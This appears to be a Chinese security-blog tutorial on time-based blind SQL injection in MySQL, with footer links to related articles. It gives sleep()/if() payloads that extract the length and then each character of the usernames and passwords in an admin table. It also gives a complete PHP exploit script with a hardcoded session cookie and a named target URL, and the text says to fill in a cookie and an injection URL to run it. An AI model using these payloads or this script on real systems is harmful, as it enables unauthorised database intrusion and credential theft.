1、 简介
延时注入也是盲注入的一种,是利用sql语句达到延时的目的,在mysql中用的sleep()函数,
select sleep(3) 数据库延时3秒 返回信息。利用这个函数加上if函数进行判断,就可以达到延时注入,注入得出数据。
构造注入延时的语句,当开始到结束的时候肯定是五秒或者大于五秒
2、 延时注入语句
php学习
<?php $time1 = time(); sleep(10); $time2 = time(); print $time2-$time1; ?>
mysql的延时语句
select if('root'='root',sleep(3),0)
数据的长度
select if(LENGTH((select GROUP_CONCAT(username,0x3a,password)from admin))=38,sleep(5),0)
每一个字符的ascii码
select if(ascii(substring((select GROUP_CONCAT(username,0x3a,password)from admin),1,1))=105,sleep(5),0)
延时注入的原理是什么? 就是利用mysql里面的sleep() 延时 就跟根据数据库的延时 判断网页的页面返回的时间。 假如条件判断正确 那么就会延时五秒,
3、编写exp
<?php //参数1:访问的URL,参数2:post数据(不填则为GET),参数3:提交的$cookies,参数4:是否返回$cookies function curl_request($url,$post='',$cookie='', $returnCookie=0){ $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)'); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($curl, CURLOPT_AUTOREFERER, 1); curl_setopt($curl, CURLOPT_REFERER, "http://XXX"); if($post) { curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($post)); } if($cookie) { curl_setopt($curl, CURLOPT_COOKIE, $cookie); } curl_setopt($curl, CURLOPT_HEADER, $returnCookie); curl_setopt($curl, CURLOPT_TIMEOUT, 10); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); $data = curl_exec($curl); if (curl_errno($curl)) { return curl_error($curl); } curl_close($curl); if($returnCookie){ list($header, $body) = explode("\r\n\r\n", $data, 2); preg_match_all("/Set\-Cookie:([^;]*);/", $header, $matches); $info['cookie'] = substr($matches[1][0], 1); $info['content'] = $body; return $info; }else{ return $data; } } //得到数据的长度 function getstrlen($url,$cookie){ $data_len =''; $i = 1; while(true){ $s = "%20and%20if(LENGTH((select%20GROUP_CONCAT(username,0x3a,password)from%20admin))={$i},sleep(5),0)"; $start_time=time(); $urlexp = $url.$s; $html = exploit($urlexp,$cookie); if ((time()-$start_time)>=5){ $data_len=$i; break; } $i++; } return $data_len; } function exploit($url,$cookie){ $html = curl_request($url,'',$cookie); return $html; } //38 function get_data($url,$cookie,$datalen){ $admin_pass = ''; for($i=1;$i<=$datalen;$i++){ for($j=1;$j<=125;$j++){ $s = "%20and%20if(ascii(substring((select%20GROUP_CONCAT(username,0x3a,password)from%20admin),{$i},1))={$j},sleep(5),0)"; $start_time=time(); $html = exploit($url.$s,$cookie); if((time()-$start_time)>=5){ $c = chr($j); $admin_pass.=$c; echo $admin_pass."\r\n"; break; } } } return $admin_pass; } $cookie = 'PHPSESSID=lkmi6apekkpfvemo5mnmf7opk7'; $url = 'http://www.moontester.com/article.php?id=1'; //用来做比较用的 //$tmp_html = exploit($url,$cookie); $datalen = getstrlen($url,$cookie); if ($datalen){ echo "[+]".$datalen."[+]\r\n"; echo get_data($url,$cookie,$datalen); }else{ echo "data null"; }
填写登录的cookie 和注入的url 就会执行getstrlen函数就会用时间差得出长度为38 再把38传入到get_data函数里 用ascii进行每一个字符的ascii码的判断 再把判断好的ascii转为字符 累加起来 就会得出最后的结果
运行结果
- 上一篇:权限维持及后门持久化技巧总结
- 下一篇:盲注入exp篇写
猜你还喜欢
- 05-18暗链隐藏的N种姿势
- 08-06多线程WEB安全日志分析脚本
- 08-04Python渗透工具的架构探讨
- 09-03自己动手打造工具系列之自动刷新简历
- 09-25伪造电子邮件以及制造电子邮件炸弹的攻防探讨
- 08-29linux操作系统的快捷键及命令讲解
- 05-12如何编写高质量的Windows Shellcode
- 02-17为Nginx加入一个使用深度学习的软WAF
- 07-23PHP
- 07-24Python入门学习
- 最新文章
- 随机文章
-
- WanaCrypt0r勒索蠕虫完全分析报告
- 远控木马中的VIP:盗刷网购账户购买虚拟礼品卡
- 比WannaCry还要可怕的勒索病毒UIWIX?应对措施看这里
- 暗链隐藏的N种姿势
- 没有钱的安全部之系统日志安全
- Joomla!3.7.0 SQL注入攻击漏洞分析
- 国际知名“青少年黑客”盘点
- 最全DOS的CMD命令,程序员必会
- 构建一个高交互型的难以发现的蜜罐
- PinDemonium通用动态脱壳工具
- 文件操作漏洞面面观
- 如何使用谷歌Chrome浏览器窃取Windows密码
- Web开发者安全速查表
- 网络安全-常见漏洞与分析
- 存储型XSS安全漏洞分析
- 浅谈跨站脚本攻击与防御
- 下一个“永恒之蓝”6月见?Shadow Brokers组织宣布将公开更多0day漏洞!
- 使用Python写一个转存纯真IP数据库的脚本
- 如何保护网页按钮不被XSS自动点击
- 揭秘“微信群控”
- 热门文章
-
- 八年专业安全团队承接渗透入侵维护服务
- Emlog黑客站模板“Milw0rm”发布
- Stuxnet纪录片-零日 Zero.Days (2016)【中文字幕】
- SQLMAP的注入命令以及使用方法
- 白帽故事汇:网络安全战士从来不是「男生」的专利
- 编辑器漏洞手册
- web安全之如何全面发现系统后台
- 常见Web源码泄露总结
- 深入理解JAVA反序列化漏洞
- cmseasy前台无需登录直接获取敏感数据的SQL注入(有POC证明)
- 网站后台登陆万能密码
- 黑麒麟2016渗透培训系列教程
- 破解emlog收费模板“Begin”
- 那些强悍的PHP一句话后门
- Android平台渗透测试套件zANTI v2.5发布(含详细说明)
- 渗透工具BackTrack与KaliLinux全套视频教程
- Python列为黑客应该学的四种编程语言之一 初学者该怎么学
- CVE-2017-11882漏洞复现和利用
- 恶意程序报告在线查询工具
- 利用Thinkphp 5缓存漏洞实现前台Getshell
- 文章标签
-